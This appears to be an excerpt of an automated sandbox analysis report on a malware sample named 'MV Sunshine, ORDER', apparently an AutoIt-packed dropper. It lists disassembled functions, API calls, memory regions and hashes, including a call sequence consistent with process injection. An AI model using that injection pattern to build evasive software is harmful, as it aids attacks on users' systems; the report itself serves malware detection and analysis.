Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009841F1

Strings

Line: , xrefs: 009BD615

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: cd77fc38c2d83ba6fa385812b5a26ed56375c0d1485bc4c5b90fad36368692dc
Instruction ID: 14c387ad10bd74b6d70bd12e24c69c30e356b874c79c56b862e76bac93c26406
Opcode Fuzzy Hash: cd77fc38c2d83ba6fa385812b5a26ed56375c0d1485bc4c5b90fad36368692dc
Instruction Fuzzy Hash: 5931D37140C3056AD721FBA0DC45FDBB7ECAF96300F10491AF185922A1EBB4A649C793

Function 009A564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 009A56AB
_memcpy_s.LIBCMT ref: 009A571D
__read_nolock.LIBCMT ref: 009A577B
__filbuf.LIBCMT ref: 009A579E
_memset.LIBCMT ref: 009A57E2

Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 082d7e315f56baee4b61dee65485b2cc3fedf2006e4a7646c99e66d8ca30ca51
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: EE51A271B00B05DBDB249FB9C88466EB7A9EF42324F668729F825A62D0D7749D508BC0

Function 009869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00984F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984F6F

_free.LIBCMT ref: 009BE68C
_free.LIBCMT ref: 009BE6D3

Part of subcall function 00986BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 009BE462
Bad directive syntax error, xrefs: 009BE6BB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: e12f1dfd75b93bb28619421c42debfa21c922fdbf9096d924ba327919fab9f83
Instruction ID: 666a4da2c4b458c65985f7d39430fc267f3652b50441f7fc51c5fca73f75a4b1
Opcode Fuzzy Hash: e12f1dfd75b93bb28619421c42debfa21c922fdbf9096d924ba327919fab9f83
Instruction Fuzzy Hash: 55917C71910219EFCF14EFA4C991AEDB7B9FF59314F14442AF816AB2A1EB34AD04CB50

Function 009835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009835A1,SwapMouseButtons,00000004,?), ref: 009835D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 009835F5
RegCloseKey.KERNELBASE(00000000,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 00983617

Strings

Control Panel\Mouse, xrefs: 009835D2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
Instruction ID: 07ff0d10f017a8730f2d581b7c48ed035a49bc7e215d34e7fa71c65562b48e52
Opcode Fuzzy Hash: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
Instruction Fuzzy Hash: 6D114571610208BFDB20DFA9DC81AAEBBBCEF04B40F008469E805E7310E2719E419BA0

Function 022212A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 02221A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02221AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02221B13

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction ID: b5b2b8fe8f8d92c956214ffb60875cf8d20a81806f8cfc30486015aed6bff859
Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction Fuzzy Hash: 30621E30A24258DBEB24CFA4C840BDEB372EF58300F1091A9D10DEB395E7769E95CB59

Function 009E97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00985045: _fseek.LIBCMT ref: 0098505D

Part of subcall function 009E99BE: _wcscmp.LIBCMT ref: 009E9AAE
Part of subcall function 009E99BE: _wcscmp.LIBCMT ref: 009E9AC1

_free.LIBCMT ref: 009E992C
_free.LIBCMT ref: 009E9933
_free.LIBCMT ref: 009E999E

Part of subcall function 009A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9C64), ref: 009A2FA9
Part of subcall function 009A2F95: GetLastError.KERNEL32(00000000,?,009A9C64), ref: 009A2FBB

_free.LIBCMT ref: 009E99A6

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: 2fbc35eb965d14848a011133ec5307f51c41fd9395647dd9f3aba3f87957f00f
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: 1F515DB1904258AFDF259F65CC81B9EBBB9EF88310F1004AEB609A7341DB755E80CF58

Function 009A493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009A49D0
__flush.LIBCMT ref: 009A49F0
__write.LIBCMT ref: 009A4A23
__flsbuf.LIBCMT ref: 009A4A51

Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: a4832dca35551aea7155f2167dd46a1c2e04687a88c874c5813d97eaf04b5ffe
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: EE4106706007069FDF28CEA9C8809AF77AAEFC2760B24853DE855C7680E7B4DD508BC4

Function 009873E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009BEE62
GetOpenFileNameW.COMDLG32(?), ref: 009BEEAC

Part of subcall function 009848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009848A1,?,?,009837C0,?), ref: 009848CE

Part of subcall function 009A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A09F4

Strings

X, xrefs: 009BEE7A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: fbcbd55e96741a30fe9099ce0b03ca8c895a05e8f3423dec74b3c8b1ca2b48cd
Instruction ID: 19e44854f919154050dfcd5b94a357412f8faac4d0b76f37a56a24452691bd51
Opcode Fuzzy Hash: fbcbd55e96741a30fe9099ce0b03ca8c895a05e8f3423dec74b3c8b1ca2b48cd
Instruction Fuzzy Hash: 7F219230A002589BCB11EF94C845BEEBBFD9F89314F104019F408A7381DBB8994A8BA1

Function 009E901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009E9036
__fread_nolock.LIBCMT ref: 009E904B

Strings

EA06, xrefs: 009E907D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 5bd2b8eff87f4fca3df78817b65b90e1751eb89fe05c5a18aad6c64cd0cc5626
Instruction ID: 8a10c101cd46ec71d0b328e51a29cd62a9abff89bb4eb53522d698d93b48240a
Opcode Fuzzy Hash: 5bd2b8eff87f4fca3df78817b65b90e1751eb89fe05c5a18aad6c64cd0cc5626
Instruction Fuzzy Hash: 6E01F9719042587EDB28CBA8C816FFE7BFC9B11301F00459AF552D2181E579EA0487A0

Function 009E9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 009E9B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009E9B99

Strings

aut, xrefs: 009E9B93

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 711a701dad5ac8b8b06a5d0f0ff7b24a8b493f39bff1dc048c3ebe84b2b2c9e6
Instruction ID: b386b168ced9e4eeec0cbe6566befc58e62ad7258a02d9c27d60556b5daccba0
Opcode Fuzzy Hash: 711a701dad5ac8b8b06a5d0f0ff7b24a8b493f39bff1dc048c3ebe84b2b2c9e6
Instruction Fuzzy Hash: B1D05E7994030DBFDB20DBD0EC0EFDA772CE718700F0046A1BE94A10A1DEB0659A8B91

Function 009FCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9737cc28f883b1ccd9ef354c493150e1a8d5908f9e08febfe66bcbe04ed7414
Instruction ID: 8c0489372c907fd11dd06db4aad63b7fc3c87db6e5be3b43f229e3929e32c704
Opcode Fuzzy Hash: f9737cc28f883b1ccd9ef354c493150e1a8d5908f9e08febfe66bcbe04ed7414
Instruction Fuzzy Hash: 2BF12771A083059FC714DF28C484A6ABBE5BFC8314F14892EF99A9B351DB31E945CF82

Function 0098F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 009A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A03D3
Part of subcall function 009A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 009A03DB
Part of subcall function 009A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A03E6
Part of subcall function 009A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A03F1
Part of subcall function 009A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 009A03F9
Part of subcall function 009A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 009A0401

Part of subcall function 00996259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0098FA90), ref: 009962B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0098FB2D
OleInitialize.OLE32(00000000), ref: 0098FBAA
CloseHandle.KERNEL32(00000000), ref: 009C49F2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 8f92737644c70696d7172ae30b9d301ded4cbcc354e5c86fee7422389ffeb75c
Instruction ID: 5b19aaba7a4f0bf4a11a1c36f0e9f293178940a81c472c621a05ff26c8dc045f
Opcode Fuzzy Hash: 8f92737644c70696d7172ae30b9d301ded4cbcc354e5c86fee7422389ffeb75c
Instruction Fuzzy Hash: 1E819BBC9013908FCB84EFB9EA546557BE4EBDB718314812AD019CB362EB365446CF53

Function 009843DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00984401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 009844A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 009844C3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 37918ba8e3cec9441786ed03e3eb017b5f319ac04b5c0c075cc8a0c8ecaba923
Instruction ID: fe03c0214c84d5a793e9fa0879953b1f40a49b0805dd27d85d58346a6d6dabc3
Opcode Fuzzy Hash: 37918ba8e3cec9441786ed03e3eb017b5f319ac04b5c0c075cc8a0c8ecaba923
Instruction Fuzzy Hash: 983150B49057019FD721EF74D884797BBE8BF8A304F00092EE59A83351E7B5A949CB92

Function 009A594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 009A5963

Part of subcall function 009AA3AB: __NMSG_WRITE.LIBCMT ref: 009AA3D2
Part of subcall function 009AA3AB: __NMSG_WRITE.LIBCMT ref: 009AA3DC

__NMSG_WRITE.LIBCMT ref: 009A596A

Part of subcall function 009AA408: GetModuleFileNameW.KERNEL32(00000000,00A443BA,00000104,?,00000001,00000000), ref: 009AA49A
Part of subcall function 009AA408: ___crtMessageBoxW.LIBCMT ref: 009AA548

Part of subcall function 009A32DF: ___crtCorExitProcess.LIBCMT ref: 009A32E5
Part of subcall function 009A32DF: ExitProcess.KERNEL32 ref: 009A32EE

Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68

RtlAllocateHeap.NTDLL(015A0000,00000000,00000001,00000000,?,?,?,009A1013,?), ref: 009A598F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 5a3d68c1c92800f28166deb833b5b5a01a361fea39c50ebb6933c30ffb6c6e8c
Instruction ID: c0f1914c20e40a312b1a36c8add5ad15e8b5b7c88e0484c595797f35bdeea269
Opcode Fuzzy Hash: 5a3d68c1c92800f28166deb833b5b5a01a361fea39c50ebb6933c30ffb6c6e8c
Instruction Fuzzy Hash: E201D235300B15DEE6216B64E842B6F729C8FC3770F92002AF504AE1C1DF759D0282E0

Function 009E9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009E97D2,?,?,?,?,?,00000004), ref: 009E9B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009E9B5B
CloseHandle.KERNEL32(00000000,?,009E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E9B62

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
Instruction ID: 439387fc3a21983540e79da4ff8183c94bc2ec6183a1e8892c8da371035b39e5
Opcode Fuzzy Hash: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
Instruction Fuzzy Hash: 08E08632581318BBD7315B94EC09FCA7B18AB05B71F144220FB24790E087B169239798

Function 009E8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009E8FA5

Part of subcall function 009A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9C64), ref: 009A2FA9
Part of subcall function 009A2F95: GetLastError.KERNEL32(00000000,?,009A9C64), ref: 009A2FBB

_free.LIBCMT ref: 009E8FB6
_free.LIBCMT ref: 009E8FC8

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: b44ed53d9d2896a5fe1627b724897d6e7c0badda3a85f9bd970839559fa5f47e
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: 85E012A170D7415ECA24A6BDAD44B9367EE5F893507180C1DB40DDB142DE24EC4181A8

Function 0098AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 009C002B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 61a2b2e611b30b3025456aff43bdded710bc0500b2721fe5db3842597ca076f1
Instruction ID: 7d6084feb8ac41320aff28edf4187a31be72d02919f97f91212e428ea03cde69
Opcode Fuzzy Hash: 61a2b2e611b30b3025456aff43bdded710bc0500b2721fe5db3842597ca076f1
Instruction Fuzzy Hash: DE224874508341DFDB24EF14C494B2ABBE5BF85300F19895EE89A8B362D735ED85CB82

Function 00984DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00984E1A

Strings

EA06, xrefs: 009BDCF5

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
